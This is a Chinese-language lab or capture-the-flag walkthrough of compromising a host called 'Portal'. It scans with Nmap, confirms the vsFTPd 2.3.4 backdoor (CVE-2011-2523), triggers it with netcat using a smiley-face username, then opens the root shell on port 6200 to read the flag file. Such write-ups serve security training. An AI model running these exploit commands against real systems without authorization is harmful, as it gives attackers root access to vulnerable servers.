针对"Portal"机器的详细渗透测试演练与利用报告,重点围绕 CVE-2011-2523(vsFTPd 2.3.4 后门)实现 root 权限获取。
⚠️ 本项目仅供教育和授权测试目的使用。
严禁未经授权访问系统。
SYAFIQ
角色:首席渗透测试工程师
| 阶段 | 工具 | 描述 |
|---|---|---|
| 发现 | Nmap | 扫描网络中的活跃主机 |
| 枚举 | Nmap | 识别服务及版本 |
| 分析 | NSE 脚本 | 检测已知漏洞 |
| 利用 | Netcat | 触发后门 |
| 后渗透 | 终端 | 获取 root 权限并取回 flag |
扫描网络中的活跃主机:
nmap -sn --unprivileged 10.150.150.10-30
✅ 结果:
-检测到 8 台主机 -目标已识别:10.150.150.12
扫描开放端口和服务:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ 发现:
-端口 21 → FTP(vsftpd) -端口 22 → SSH(OpenSSH 8.2p1)
检查已知的 FTP 后门漏洞:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 结果:
-目标存在漏洞 -CVE-2011-2523 漏洞已确认
使用恶意用户名触发后门:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ 这将在 6200 端口打开一个隐藏的 root shell
连接到后门并执行命令:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
已获得 root 权限 已确认 uid=0(root)
🏁 Flag 已捕获:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
学习网络安全 道德黑客实践 授权渗透测试
❌ 请勿将此知识用于非法活动。
“安全不是产品,而是过程。” —— 始终测试、监控并改进。